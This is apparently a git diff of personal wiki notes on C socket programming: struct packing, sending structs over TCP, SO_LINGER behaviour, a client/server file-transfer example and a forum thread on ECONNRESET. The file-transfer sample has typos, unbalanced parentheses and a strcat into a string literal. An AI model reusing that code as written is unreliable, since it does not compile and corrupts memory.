方法来得到各种信息,但这样做不仅编程复杂,而且一旦协议有变化,程序修改起来
|
||||
也比较麻烦。在了解了编译器对结构空间的分配原则之后,我们完全可以利用这
|
||||
一特性定义自己的协议结构,通过访问结构的成员来获取各种信息。这样做,
|
||||
不仅简化了编程,而且即使协议发生变化,我们也只需修改协议结构的定义即可,
|
||||
其它程序无需修改,省时省力。下面以TCP协议首部为例,说明如何定义协议结构。
|
||||
其协议结构定义如下:
|
||||
#pragma pack(1) // 按照1字节方式进行对齐
|
||||
struct TCPHEADER
|
||||
{
|
||||
short SrcPort; // 16位源端口号
|
||||
short DstPort; // 16位目的端口号
|
||||
int SerialNo; // 32位序列号
|
||||
int AckNo; // 32位确认号
|
||||
unsigned char HaderLen : 4; // 4位首部长度
|
||||
unsigned char Reserved1 : 4; // 保留6位中的4位
|
||||
unsigned char Reserved2 : 2; // 保留6位中的2位
|
||||
unsigned char URG : 1;
|
||||
unsigned char ACK : 1;
|
||||
unsigned char PSH : 1;
|
||||
unsigned char RST : 1;
|
||||
unsigned char SYN : 1;
|
||||
unsigned char FIN : 1;
|
||||
short WindowSize; // 16位窗口大小
|
||||
short TcpChkSum; // 16位TCP检验和
|
||||
short UrgentPointer; // 16位紧急指针
|
||||
};
|
||||
#pragma pack() // 取消1字节对齐方式 #pragma pack规定的对齐长度,实际使用的规则是: 结构,联合,或者类的数据成员,第一个放在偏移为0的地方,以后每个数据成员的对齐,按照#pragma pack指定的数值和这个数据成员自身长度中,比较小的那个进行。 也就是说,当#pragma pack的值等于或超过所有数据成员长度的时候,这个值的大小将不产生任何效果。 而结构整体的对齐,则按照结构体中最大的数据成员 和 #pragma pack指定值 之间,较小的那个进行。
|
||||
指定连接要使用的库比如我们连接的时候用到了 WSock32.lib,你当然可以不辞辛苦地把它加入到你的工程中。但是我觉得更方便的方法是使用 #pragma 指示符,指定要连接的库:#pragma comment(lib, "WSock32.lib")
|
||||
|
||||
扩展阅读:
|
||||
@@ -0,0 +1,71 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-04T17:18:13+08:00
|
||||
|
||||
====== send structure using socket ======
|
||||
Created 星期六 04 六月 2011
|
||||
|
||||
------The problem with sending binary data structures over the network is manifold:
|
||||
|
||||
1. You don't know if the structure is compatible with the hardware/software on the other end (word sizes, structure padding/alignment, word endianess, etc).
|
||||
2. Because of #1, you need to encode the structure to some network-neutral format when it's sent and decode it on the receiving end.
|
||||
3. There are many means to accomplish #2, including XML (verbose, but human-readable).
|
||||
|
||||
You can eliminate this cruft if you are 100% certain that the sending and receiving ends are 100% binary compatible and that the applications were built on both ends with the same compiler and linker settings. Good luck in that!
|
||||
|
||||
-------What you should do is serialize the information in the structure into a generic format, send that over the network, and recreate the object on the other side.
|
||||
|
||||
Trying to do the equivalent of a memcpy of the struct over a socket will probably fail horribly.
|
||||
|
||||
I suggest serializing to XML. There's lots of libraries available to work with it.
|
||||
|
||||
------------Linux程序设计 Linux socket send and recevie structure
|
||||
|
||||
最近在开发一个Linux下的聊天软件,好久没有做C语言的开发了,感觉到很多东西已经生疏了,这下又碰到用Socket传递结构体的问题,google了一下,发现也有不少朋友遇到同样的问题,所以就打算写出自己的解决办法,跟大家分享。
|
||||
Socket中的send函数可以发送字符串,但不能直接发送结构体,因此在发送端先把结构体转成字符串,然后用send发送,在接收端recv字符串,再转换成原先的结构体,这个就是解决问题的主要思路,实现中要注意的问题在下文阐述。
|
||||
为了客户端之间能够互相通信,实现私聊,我采用服务器转发的方式,因此用户发送的每条消息中除了消息主体外,还必须包含有发送者、接收者ID等信息,如此采用结构体便是最佳的办法了。我定义的结构体如下:
|
||||
|
||||
struct send_info
|
||||
{
|
||||
char info_from[20]; //发送者ID
|
||||
char info_to[20]; //接收者ID
|
||||
int info_length; //发送的消息主体的长度
|
||||
char info_content[1024]; //消息主体
|
||||
};
|
||||
|
||||
发送端主要代码(为了简洁说明问题,我把用户输入的内容、长度等验证的代码去掉了):
|
||||
|
||||
struct send_info info1; //定义结构体变量
|
||||
printf("This is client,please input message:");
|
||||
//从键盘读取用户输入的数据,并写入info1.info_content
|
||||
memset(info1.info_content,0,sizeof(info1.info_content));//清空缓存
|
||||
info1.info_length=read(STDIN_FILENO,info1.info_content,1024) - 1;//读取用户输入的数据
|
||||
|
||||
memset(snd_buf,0,1024);//清空发送缓存,不清空的话可能导致接收时产生乱码,
|
||||
//或者如果本次发送的内容少于上次的话,snd_buf中会包含有上次的内容
|
||||
|
||||
__memcpy(snd_buf,&info1,sizeof(info1)); //结构体转换成字符串__
|
||||
send(connect_fd,snd_buf,sizeof(snd_buf),0);//发送信息
|
||||
|
||||
接收端主要代码:
|
||||
|
||||
struct send_info clt; //定义结构体变量
|
||||
|
||||
memset(recv_buf,'z',1024);//清空缓存
|
||||
recv(fd,recv_buf,1024,0 );//读取数据
|
||||
|
||||
memset(&clt,0,sizeof(clt));//清空结构体
|
||||
__memcpy(&clt,recv_buf,sizeof(clt));//把接收到的信息转换成结构体__
|
||||
|
||||
clt.info_content[clt.info_length]='';
|
||||
//消息内容结束,没有这句的话,可能导致消息乱码或输出异常
|
||||
//有网友建议说传递的结构体中尽量不要有string类型的字段,估计就是串尾符定位的问题
|
||||
|
||||
if(clt.info_content) //判断接收内容并输出
|
||||
printf("nclt.info_from is %snclt.info_to is %snclt.info_content is%snclt.info_length is %dn",clt.info_from,clt.info_to,clt.info_content,clt.info_length);
|
||||
//至此,结构体的发送与接收已经顺利结束了
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
104
Zim/Programme/APUE/setsockopt_:SO_LINGER_选项设置.txt
Normal file
@@ -0,0 +1,104 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-03T21:37:25+08:00
|
||||
|
||||
====== setsockopt :SO LINGER 选项设置 ======
|
||||
Created 星期五 03 六月 2011
|
||||
http://blog.csdn.net/factor2000/archive/2009/02/23/3929816.aspx
|
||||
|
||||
此选项指定函数close对面向连接的协议如何操作(如TCP)。内核缺省close操作是立即返回,如果有数据残留在套接口缓冲区中则系统将试着将这些数据发送给对方。
|
||||
|
||||
SO_LINGER选项用来改变此缺省设置。使用如下结构:
|
||||
|
||||
struct linger {
|
||||
int l_onoff; /* 0 = off, nozero = on */
|
||||
int l_linger; /* linger time */
|
||||
};
|
||||
|
||||
|
||||
有下列三种情况:
|
||||
|
||||
1、设置 l_onoff为0,则该选项关闭,l_linger的值被忽略,等于内核缺省情况,**close调用会立即返回**给调用者,如果可能将会传输任何未发送的数据(调用进程立即结束,但进程对应的TCP发送缓冲区中可能还有未发送完的数据,所以TCP连接可能会延迟一段时间后关闭,这个是正常的TIME_WAIT状态);
|
||||
2、设置 l_onoff为非0,l_linger为0,则套接口关闭时TCP夭折连接,TCP将丢弃保留在套接口发送缓冲区中的任何数据并发送一个__RST__给对方,而不是通常的四分组终止序列,这避免了**TIME_WAIT**状态;
|
||||
3、设置 l_onoff 为非0,l_linger为非0,当套接口关闭时内核将拖延一段时间(由l_linger决定)。如果套接口缓冲区中仍残留数据,**进程将处于睡眠状态(注意close调用不是立即返回)**,直 到(a)所有数据发送完且被对方确认,之后进行正常的终止序列(描述字访问计数为0)或(b)延迟时间到。此种情况下,应用程序检查close的返回值是非常重要的,如果在数据发送完并被确认前时间到(超时),close将返回EWOULDBLOCK错误且套接口发送缓冲区中的任何数据都丢失。close的成功返回仅告诉我们发送的数据(和FIN)已由对方TCP确认,它并不能告诉我们对方应用进程是否已读了数据。如果套接口设为非阻塞的,它将不等待close完成。
|
||||
|
||||
注释:l_linger的单位依赖于实现: 4.4BSD假设其单位是时钟滴答(百分之一秒),但Posix.1g规定单位为秒。
|
||||
|
||||
|
||||
下面的代码是一个使用SO_LINGER选项的例子,使用30秒的超时时限:
|
||||
#define TRUE 1
|
||||
#define FALSE 0
|
||||
int z; /* Status code*/
|
||||
int s; /* Socket s */
|
||||
struct linger so_linger;
|
||||
...
|
||||
so_linger.l_onoff = TRUE;
|
||||
so_linger.l_linger = 30;
|
||||
z = setsockopt(s,
|
||||
SOL_SOCKET,
|
||||
SO_LINGER,
|
||||
&so_linger,
|
||||
sizeof so_linger);
|
||||
if ( z )
|
||||
perror("setsockopt(2)");
|
||||
|
||||
下面的例子显示了如何设置SO_LINGER的值来中止套接口s上的当前连接:
|
||||
#define TRUE 1
|
||||
#define FALSE 0
|
||||
int z; /* Status code */
|
||||
int s; /* Socket s */
|
||||
struct linger so_linger;
|
||||
...
|
||||
so_linger.l_onoff = TRUE;
|
||||
so_linger.l_linger = 0;
|
||||
z = setsockopt(s,
|
||||
SOL_SOCKET,
|
||||
SO_LINGER,
|
||||
&so_linger,
|
||||
sizeof so_linger);
|
||||
if ( z )
|
||||
perror("setsockopt(2)");
|
||||
**close(s); /* Abort connection */**
|
||||
|
||||
在上面的这个例子中,当调用close函数时,套接口s会立即中止。__中止的语义是通过将超时值设置为0来实现的__。
|
||||
正常情况下,TCP收到不在已有连接中的数据(但不包括序号是将来收到的哪些)时会自动发送RST给对方,应用进程是不知晓的。
|
||||
但应用进程可以通过将l_linger设为0然后调用close的方法来异常终止(不是通常的四次握手,而是通过RST)与对方的通信。
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
/********** WINDOWS **********/
|
||||
|
||||
|
||||
|
||||
/* 当连接中断时,需要延迟关闭(linger)以保证所有数据都被传输,所以需要打开SO_LINGER这个选项;
|
||||
* //注:大致意思就是说SO_LINGER选项用来设置当调用closesocket时是否马上关闭socket;
|
||||
* linger的结构在/usr/include/linux/socket.h中定义://注:这个结构就是SetSocketOpt中的Data的数据结构
|
||||
* struct linger
|
||||
* {
|
||||
* int l_onoff; /* Linger active */ //低字节,0和非0,用来表示是否延时关闭socket
|
||||
* int l_linger; /* How long to linger */ //高字节,延时的时间数,单位为秒
|
||||
* };
|
||||
* 如果l_onoff为0,则延迟关闭特性就被取消。
|
||||
|
||||
* 如果非零,则允许套接口延迟关闭; l_linger字段则指明延迟关闭的时间
|
||||
*/
|
||||
|
||||
|
||||
更具体的描述如下:
|
||||
1、若设置了SO_LINGER(亦即linger结构中的l_onoff域设为非零),并设置了零超时间隔,则closesocket()不被阻塞立即执行,不论是否有排队数据未发送或未被确认。这种关闭方式称为“强制”或“失效”关闭,因为套接口的虚电路立即被复位,且丢失了未发送的数据。在远端的recv()调用将以WSAECONNRESET出错。
|
||||
|
||||
2、若设置了SO_LINGER并确定了非零的超时间隔,则closesocket()调用阻塞进程,直到所剩数据发送完毕或超时。这种关闭称为“优雅”或“从容”关闭。请注意如果套接口置为非阻塞且SO_LINGER设为非零超时,则closesocket()调用将以WSAEWOULDBLOCK错误返回。
|
||||
|
||||
3、若在一个流类套接口上设置了SO_DONTLINGER(也就是说将linger结构的l_onoff域设为零),则closesocket()调用立即返回。但是,如果可能,排队的数据将在套接口关闭前发送。请注意,在这种情况下WINDOWS套接口实现将在一段不确定的时间内保留套接口以及其他资源,这对于想用所以套接口的应用程序来说有一定影响。
|
||||
|
||||
|
||||
SO_DONTLINGER 若为真,则SO_LINGER选项被禁止。
|
||||
SO_LINGER延迟关闭连接 struct linger上面这两个选项影响close行为;
|
||||
|
||||
|
||||
选项 间隔 关闭方式 等待关闭与否
|
||||
SO_DONTLINGER 不关心 优雅 否
|
||||
SO_LINGER 零 强制 否
|
||||
SO_LINGER 非零 优雅 是
|
||||
187
Zim/Programme/APUE/socket.txt
Normal file
@@ -0,0 +1,187 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-04-20T17:01:46+08:00
|
||||
|
||||
====== socket ======
|
||||
Created Wednesday 20 April 2011
|
||||
http://bbs.chinaunix.net/thread-2278881-1-2.html
|
||||
TCP/IP编程实现远程文件传输
|
||||
|
||||
在TCP/IP网络结构中,为了保证网络安全,网络人员往往需要在路由器上添加防火墙,禁止非法用户用ftp等安全危害较大的TCP/IP协议访问主机。而有时系统维护人员需要用ftp将一些文件从中心机房主机传到前端网点主机上,比如应用程序的替换升级。如果每次传输文件时都要打开防火墙,未免显得有些繁琐,要是在自己的应用程序中增加一个专门的文件传输模块,那将是十分愉快的事情。
|
||||
|
||||
UNIX网络程序设计一般都采用套接字(socket)系统调用。针对目前十分流行的客户/服务器模式,其程序编写步骤如下:
|
||||
1.Socket系统调用
|
||||
为了进行网络I/O,服务器和客户机两端的UNIX进程要做的第一件事是调用socket()系统调用,建立软插座,指明合适的通讯协议。格式为:
|
||||
#include<sys/types.h>;
|
||||
#include<sys/socket.h>;
|
||||
int socket(int family,int type,int protocol)
|
||||
其中:(1)family指明套节字族,其值包括:
|
||||
AF_UNIX (UNIX内部协议族)
|
||||
AF_INET (Iternet协议)
|
||||
AF_NS (XeroxNs协议,TCP/IP编程取该值)
|
||||
AF_IMPLINK (IMP链接层)
|
||||
(2)type 指明套接字类型,取值有:
|
||||
SOCK_STREAM (流套接字)
|
||||
SOCK_DGRAM (数据报套接字)
|
||||
SOCK_RAW (原始套接字)
|
||||
SOCK_SEQPACKET (定序分组套接字)
|
||||
一般情况下,前两个参数的组合就可以决定所使用的协议,这时第三个参数被置为0,如果第一个参数为AF_INET,第二个参数选SOCK_STREAM,则使用的协议为TCP;第二个参数选SOCK_DGRAM,则使用的协议为UDP;当第二个参数选SOCK_RAW时,使用的协议为IP。值得指出的是并不是所有的族和类型的组合都是合法的,具体请查阅相关资料。该系统调用若成功则返回一个类似文件描述符,成为套节字描述字,可以像文件描述符那样用read和write对其进行I/O操作。当一个进程使用完该软插座时,需用close(<描述符>关闭(具体见后面内容)。
|
||||
2.服务器端Bind系统调用
|
||||
软插座创建时并没有与任何地址相关联,必须用bind()系统调用为其建立地址联系。其格式为:
|
||||
#include<sys/types.h>;
|
||||
#include<sys/socket.h>;
|
||||
int bind(int socketfd,struct sockaddr_in *localaddr,sizeof(localaddr));
|
||||
其中:(1)第一个参数socketfd是前步socket()系统调用返回的套节字描述符。
|
||||
(2)第二个参数被捆向本地地址的一种结构,该结构在sys/netinet/in.h中定义:
|
||||
struct sockaddr_in{
|
||||
short sin_family;/*socket()系统调用的协议族如AF_INET*/
|
||||
u_short sin_port;/*网络字节次序形式的端口号码*/
|
||||
struct in_addr sin_addr;/*网络字节次序形式的网络地址*/
|
||||
char sin_zero[8];
|
||||
}
|
||||
一台机器上的每个网络程序使用一个各自独立的端口号码,例如:telnet程序使用端口号23,而ftp文件传输程序使用端口号21。我们在设计应用程序时,端口号码可以由getservbyname()函数从/etc/services库文件中获取,也可以由htons (int portnum)函数将任意正整数转换为网络字节次序形式来得到,有些版本的UNIX操作系统则规定1024以下的端口号码只可被超级用户使用,普通用户程序使用的端口号码只限于1025到32767之间。网络地址可以由gethostbyname(char*hostname)函数得到(该函数和getservbyname()一样都以网络字节次序形式返回所有在他们结构中的数据),参数hostname为/etc/hosts文件中某一网络地址所对应的机器名。该函数返回一个类型为hostent的结构指针,hostent结构在netdb.h中定义:
|
||||
struct hostent{
|
||||
char *h_name;
|
||||
char **h_aliases;
|
||||
int h_addrtype;
|
||||
int h_length; /*地址长度*/
|
||||
char **h_addr_list;
|
||||
#define h_addr h_addr_list[0];/*地址*/
|
||||
}
|
||||
(3)第三个参数为第二个结构参数的长度,如果调用成功,bind返回0,否则将返回-1并设置errno。
|
||||
3.服务器端系统调用listen,使服务器愿意接受连接
|
||||
格式:int listen(int socketfd,int backlong)
|
||||
它通常在socket和bind调用后在accept调用前执行。第二个参数指明在等待服务器执行accept调用时系统可以排队多少个连接要求。此参数常指定为5,也是目前允许的最大值。
|
||||
4.服务器调用accept,以等待客户机调用connect进行连接。格式如下:
|
||||
int newsocket=(int socketfd,struct sockaddr_in *peer,int*addrlen);
|
||||
该调用取得队列上的第一个连接请求并建立一个具有与sockfd相同特性的套节字。如果没有等待的连接请求,此调用阻塞调用者直到一连接请求到达。连接成功后,该调用将用对端的地址结构和地址长度填充参数peer和addlen,如果对客户端的地址信息不感兴趣,这两个参数用0代替。
|
||||
5.客户端调用connect()与服务器建立连接。格式为:
|
||||
connect(int socketfd,struct sockaddr_in *servsddr,int addrlen)
|
||||
客户端取得套接字描述符后,用该调用建立与服务器的连接,参数socketfd为socket()系统调用返回的套节字描述符,第二和第三个参数是指向目的地址的结构及以字节计量的目的地址的长度(这里目的地址应为服务器地址)。调用成功返回0,否则将返回-1并设置errno。
|
||||
6.通过软插座发送数据
|
||||
一旦建立连接,就可以用系统调用read和write像普通文件那样向网络上发送和接受数据。Read接受三个参数:一个是套节字描述符;一个为数据将被填入的缓冲区,还有一个整数指明要读的字节数,它返回实际读入的字节数,出错时返回-1,遇到文件尾则返回0。Write也接受三个参数:一个是套节字描述符;一个为指向需要发送数据的缓冲区,还有一个整数指明要写入文件的字节个数,它返回实际写入的字节数,出错时返回-1。当然,也可以调用send和recv来对套节字进行读写,其调用与基本的read和write系统调用相似,只是多了一个发送方式参数。
|
||||
7.退出程序时,应按正常方式关闭套节字。格式如下:
|
||||
int close(socketfd)
|
||||
前面介绍了UNIX客户/服务器模式网络编程的基本思路和步骤。值得指出的是socket编程所涉及的系统调用不属于基本系统调用范围,其函数原形在libsocket.a文件中,因此,在用cc命令对原程序进行编译时需要带-lsocket选项。
|
||||
现在,我们可以针对文章开头提出的问题着手进行编程了。在图示的网络结构中,为使中心机房的服务器能和网点上的客户机进行通信,需在服务器端添加通过路由器1112到客户机的路由,两台客户机也必须添加通过路由器2221到服务器的路由。在服务器的/etc/hosts文件中应该包含下面内容:
|
||||
1.1.1.1 server
|
||||
2.2.2.2 cli1
|
||||
2.2.2.3 cli2
|
||||
客户机的/etc/hosts文件中应该有本机地址信息和服务器的地址信息,如cli1客户机的/etc/hosts文件:
|
||||
2.2.2.2 cli1
|
||||
1.1.1.1 server
|
||||
网络环境搭建好后,我们可以在服务器端编写fwq.c程序,负责接受客户机的连接请求,并将从源文件中读取的数据发送到客户机。客户机程序khj.c向服务器发送连接请求,接收从服务器端发来的数据,并将接收到的数据写入目标文件。源程序如下:
|
||||
/*服务器源程序fwq.c*/
|
||||
#include<stdio.h>;
|
||||
#include<sys/types.h>;
|
||||
#include<sys/fcntl.h>;
|
||||
#include<sys/socket.h>;
|
||||
#include<sys/netinet/in.h>;
|
||||
#include<netdb.h>;
|
||||
#include<errno.h>;
|
||||
main()
|
||||
{
|
||||
char c,buf[1024],file[30];
|
||||
int fromlen,source;
|
||||
register int k,s,ns;
|
||||
struct sockaddr_in sin;
|
||||
struct hostent *hp;
|
||||
system(″clear″);
|
||||
printf(″\n″);
|
||||
|
||||
printf(″\n\n\t\t输入要传输的文件名:″);
|
||||
scanf(″%s″,file);
|
||||
if ((source=open(file,O_RDONLY))<0){
|
||||
perror(″源文件打开出错″);
|
||||
exit(1);
|
||||
}
|
||||
printf(″\n\t\t在传送文件,稍候…″);
|
||||
hp=gethostbyname(″server″);
|
||||
if (hp==NULL){
|
||||
perror(″返回主机地址信息错!!!″);
|
||||
exit(2);
|
||||
}
|
||||
s=socket(AF_INET,SOCK_STREAM,0);
|
||||
if(s<0){
|
||||
perror(″获取SOCKET号失败!!!″);
|
||||
exit(3);
|
||||
}
|
||||
sin.sin_family=AF_INET;
|
||||
sin.sin_port=htons(1500);/*使用端口1500*/
|
||||
bcopy(hp->;h_addr,&sin.sin_addr,hp->;h_length);
|
||||
if(bind(s,&sin,sizeof(sin))<0){
|
||||
perror(″不能将服务器地址捆绑到SOCKET号上!!!″);
|
||||
colse(s);
|
||||
exit(4);
|
||||
}
|
||||
if(listen(s,5)<0{
|
||||
perror(″sever:listen″);
|
||||
exit(5);
|
||||
}
|
||||
while(1){
|
||||
if((ns=accept(s,&sin,&fromlen))<0){
|
||||
perror(″sever:accept″);
|
||||
exit(6);
|
||||
}
|
||||
lseek(source,OL,0);/*每次接受客户机连接,应将用于读的源文件指针移到文件头*/
|
||||
write(ns,file,sizeof(file)); /*发送文件名*/
|
||||
while((k=read(source,buf,sizeof(buf)))>;0)
|
||||
write(ns,buf,k);
|
||||
printf(″\n\n\t\t传输完毕!!!\n″);
|
||||
close(ns);
|
||||
}
|
||||
close(source);
|
||||
exit(0);
|
||||
/*客户机源程序khj.c*/
|
||||
#include<stdio.h>;
|
||||
#include<sys/types.h>;
|
||||
#include<sys/fcntl.h>;
|
||||
#include<sys/socket.h>;
|
||||
#include<sys/netinet/in.h>;
|
||||
#include<netdb.h>;
|
||||
#include<errno.h>;
|
||||
#include <string.h>;
|
||||
main()
|
||||
{
|
||||
char buf[1024],file[30];
|
||||
char *strs=″\n\n\t\t正在接收文件″;
|
||||
int target;
|
||||
register int k,s;
|
||||
struct sockaddr_in sin;
|
||||
struct hostent *hp;
|
||||
system(″clear″);
|
||||
printf(″\n″);
|
||||
|
||||
hp=gethostbyname(″server″);
|
||||
if(hp==NULL){
|
||||
perror(″返回服务器地址信息错!!!″);
|
||||
exit(1);
|
||||
}
|
||||
s=socket(AF_INET,SOCK_STREAM,0);
|
||||
if(s<0){
|
||||
perror(″获取SOCKET号失败!!!″);
|
||||
exit(2);
|
||||
}
|
||||
sin.sin_family=AF_INET;
|
||||
sin.sin_port=htons(1500);/*端口号需与服务器程序使用的一致*/
|
||||
bcopy(hp->;h_addr,&sin.sin_addr,hp->;h_length);
|
||||
printf(″\n\n\t\t正在与服务器连接…″);
|
||||
if(connect(s,&sin,sizeof(sin),0)<0){
|
||||
perror(″不能与服务器连接!!!″);
|
||||
exit(3);
|
||||
}
|
||||
while((k=read(s,file,sizeof(file)))<=0/*接收文件名*/
|
||||
if((target=open(file,o_WRONLY|O_CREAT|O_TRUNC,0644))<0){
|
||||
perror(″不能打开目标文件!!″);
|
||||
exit(4);
|
||||
}
|
||||
strcat(strs,file);
|
||||
strcat(strs,″,稍候…″);
|
||||
write(1,strs,strlen(strs));
|
||||
while((k=read(s,buf,sizeof(buf)))>;0)
|
||||
write(tatget,buf,k);
|
||||
printf(″\n\n\t\t接收文件成功!!!\n″);
|
||||
close(s);
|
||||
close(target);
|
||||
}
|
||||
上述程序在Sco Unix System v3.2及Sco TCP/IP Rumtime环境下调试通过。
|
||||
411
Zim/Programme/APUE/socket/How_do_you_get_ECONNRESET_on_recv.txt
Normal file
@@ -0,0 +1,411 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2012-02-27T16:36:05+08:00
|
||||
|
||||
====== How do you get ECONNRESET on recv ======
|
||||
Created Monday 27 February 2012
|
||||
|
||||
http://fixunix.com/unix/84635-how-do-you-get-econnreset-recv.html
|
||||
|
||||
The man page for __recv__ and __read__ list the error __ECONNRESET__ as an error
|
||||
condition that happens when "A connection was forcibly closed __by a__
|
||||
__ peer__."~~ I take this to mean that, assuming a TCP connection, if a~~
|
||||
~~ client is recv'ing from a server, and the server suddenly crashes,~~
|
||||
~~ then on the client side recv will return -1 and set errno to~~
|
||||
~~ ECONNRESET.~~
|
||||
|
||||
For the purpose of **robust error handling**, I'm trying to integrate
|
||||
routines to take care of this sort of thing in my program. But I
|
||||
simply** can't actually get recv to return ECONNRESET** in any of my
|
||||
tests. For testing purposes, I set up a simple server and a simple
|
||||
client. The server sends data, and a background thread raises a
|
||||
__SIGSEGV__ while the server is sending, causing the whole program to
|
||||
crash. Meanwhile, the client is recv'ing. But when the server
|
||||
crashes, the client does not issue an ECONNRESET error. Rather, recv
|
||||
__ returns 0 and errno is set to 0__. No error condition is generated at
|
||||
all. But the man page says that recv should only return 0 if "the
|
||||
peer has performed an orderly shutdown". But a SIGSEGV is certainly
|
||||
not my idea of an "orderly shutdown"!
|
||||
|
||||
So, is the behavior of recv in this aspect something that is
|
||||
implementation defined, i.e. not identical across platforms? Maybe
|
||||
some UNIX environments return ECONNRESET on recv, but others don't?
|
||||
Or does recv never return ECONNRESET with TCP?
|
||||
--------------------------------------------------------
|
||||
Reply With Quote Reply With Quote
|
||||
10-04-2007 12:09 AM #2
|
||||
Re: How do you get ECONNRESET on recv?
|
||||
|
||||
On 2007-08-09, chsalvia@gmail.com wrote:
|
||||
> The man page for recv and read list the error ECONNRESET as an error
|
||||
> condition that happens when "A connection was forcibly closed by a
|
||||
> peer." I take this to mean that, assuming a TCP connection, if a
|
||||
> client is recv'ing from a server, and the server suddenly crashes,
|
||||
> then on the client side recv will return -1 and set errno to
|
||||
> ECONNRESET.
|
||||
|
||||
Well, your understanding is__ probably wrong.__
|
||||
|
||||
The TCP answers with RESET when you try to __send__ some data to peer that
|
||||
does not want to __read__ that data. In other words the peer has __closed__
|
||||
connection or has done __shutdown of reading__.
|
||||
|
||||
Normally, if the peer__ closes__ connection, recv returns 0 without any
|
||||
error. The same applies to the cases when the peer application crashes.
|
||||
|
||||
Now, if you try to send the data to peer after you got 0 from recv,
|
||||
you should get RESET.
|
||||
|
||||
__ recv返回0,说明对方已经关闭了(close)连接,或关闭了写端(shutdown(SHUT_WR))。__
|
||||
在本地也调用close后再send,就会收到RESET报文。
|
||||
以后再发send
|
||||
|
||||
如果是前者,客户端send数据时服务器端TCP会返回RESET报文,send出错,errno为
|
||||
**ECONNRESET。**
|
||||
|
||||
If you try to send the data after you got RESET, you'll __get EPIPE or SIGPIPE__.
|
||||
|
||||
So, theoretically, you can see ECONNRESET in recv only if the peer does
|
||||
__ shutdown(SHUT_RD) __and you try to send some data after this. Which
|
||||
usually never happens More often the peer__ closes __socket unexpectedly
|
||||
while you are sending many chunks of data and as result you get
|
||||
SIGPIPE, because your first send triggers RESET, and your second send
|
||||
triggers SIGPIPE, because you didn't see the RESET.
|
||||
|
||||
--
|
||||
Minds, like parachutes, function best when open
|
||||
|
||||
Reply With Quote Reply With Quote
|
||||
10-04-2007 12:09 AM #3
|
||||
Re: How do you get ECONNRESET on recv?
|
||||
|
||||
chsalvia@gmail.com wrote:
|
||||
> The man page for recv and read list the error ECONNRESET as an error
|
||||
> condition that happens when "A connection was forcibly closed by a
|
||||
> peer." I take this to mean that, assuming a TCP connection, if a
|
||||
> client is recv'ing from a server, and the server suddenly crashes,
|
||||
> then on the client side recv will return -1 and set errno to
|
||||
> ECONNRESET.
|
||||
|
||||
Actually no When the server _system_ suddenly crashes, your
|
||||
application receives nothing.
|
||||
|
||||
ECONNRESET means the connection has received a ReSeT (RST) segment
|
||||
(ostesibly) from the remote TCP. There are a multitude of reasons
|
||||
such a segment could be received, including, but not limited to:
|
||||
|
||||
*) the remote abused SO_LINGER and did an abortive close of the
|
||||
connection
|
||||
|
||||
*) your application sent data which arrived after the remote called
|
||||
shutdown(SHUT_RD) or close()
|
||||
|
||||
*) the remote TCP hit a retransmission limit and aborted (yes, if the
|
||||
data segments weren't getting through the chances of the RST making
|
||||
it are slim, but still non-zero)
|
||||
|
||||
*) there was some actual TCP protocol error between the two systems
|
||||
|
||||
99 times out of ten if the server _application_ terminates
|
||||
(prematurely) the normal close() which happens on almost all platorms
|
||||
will cause TCP to emit a FINished (FIN) segment. That would then be a
|
||||
recv/read return of zero at your end. Of course if your application
|
||||
ignored that and then tried to send something, that brings us to the
|
||||
second bullet item above.
|
||||
|
||||
> But the man page says that recv should only return 0 if "the peer
|
||||
> has performed an orderly shutdown". But a SIGSEGV is certainly not
|
||||
> my idea of an "orderly shutdown"!
|
||||
|
||||
Ah, but as per above, 99 times out of ten, when the OS is cleaning-up
|
||||
after the SIGSEGV'd application, it goes ahead and calls (the moral
|
||||
equivalent to) close(), which unless perhaps the application has set
|
||||
the abortive close SO_LINGER options will result in a FIN being sent.
|
||||
The TCP code doesn't know the difference between a close() from the
|
||||
app making a direct call, the system making a close() call on normal
|
||||
program termination, or one from abnormal termination.
|
||||
|
||||
I suppse you could try setting the SO_LINGER options on the server
|
||||
code to cause an RST when close() is called and then see what killing
|
||||
the process does. Just be sure that you only do that in a debug
|
||||
version and/or have code to put SO_LINGER back the way it should be
|
||||
when doing a "normal" close() in your server app. Hmm, that might be
|
||||
one of the few valid (IMO) reasons to use that otherwise heinous
|
||||
direct-to_RST SO_LINGER option... Perhaps one day I will try that
|
||||
with netperf.
|
||||
|
||||
rick jones
|
||||
--
|
||||
Process shall set you free from the need for rational thought.
|
||||
these opinions are mine, all mine; HP might not want them anyway...
|
||||
feel free to post, OR email to rick.jones2 in hp.com but NOT BOTH...
|
||||
|
||||
Reply With Quote Reply With Quote
|
||||
10-04-2007 12:09 AM #4
|
||||
Re: How do you get ECONNRESET on recv?
|
||||
|
||||
Andrei Voropaev writes:
|
||||
> So, theoretically, you can see ECONNRESET in recv only if the peer does
|
||||
> shutdown(SHUT_RD) and you try to send some data after this. Which
|
||||
> usually never happens More often the peer closes socket unexpectedly
|
||||
> while you are sending many chunks of data and as result you get
|
||||
> SIGPIPE, because your first send triggers RESET, and your second send
|
||||
> triggers SIGPIPE, because you didn't see the RESET.
|
||||
|
||||
Actually, a more common cause is that the peer uses the SO_LINGER
|
||||
option, sets l_onoff to 1 (true) and l_linger to 0 (zero time), then
|
||||
closes the socket. On systems that implement BSD sockets properly,
|
||||
that causes the system to emit TCP RST and blow away the connection.
|
||||
Your application will then see ECONNRESET or SIGPIPE or EPIPE,
|
||||
depending on where it was when the message was received.
|
||||
|
||||
--
|
||||
James Carlson, Solaris Networking
|
||||
Sun Microsystems / 1 Network Drive 71.232W Vox +1 781 442 2084
|
||||
MS UBUR02-212 / Burlington MA 01803-2757 42.496N Fax +1 781 442 1677
|
||||
|
||||
Reply With Quote Reply With Quote
|
||||
10-04-2007 12:09 AM #5
|
||||
Re: How do you get ECONNRESET on recv?
|
||||
|
||||
In article ,
|
||||
Rick Jones wrote:
|
||||
|
||||
> chsalvia@gmail.com wrote:
|
||||
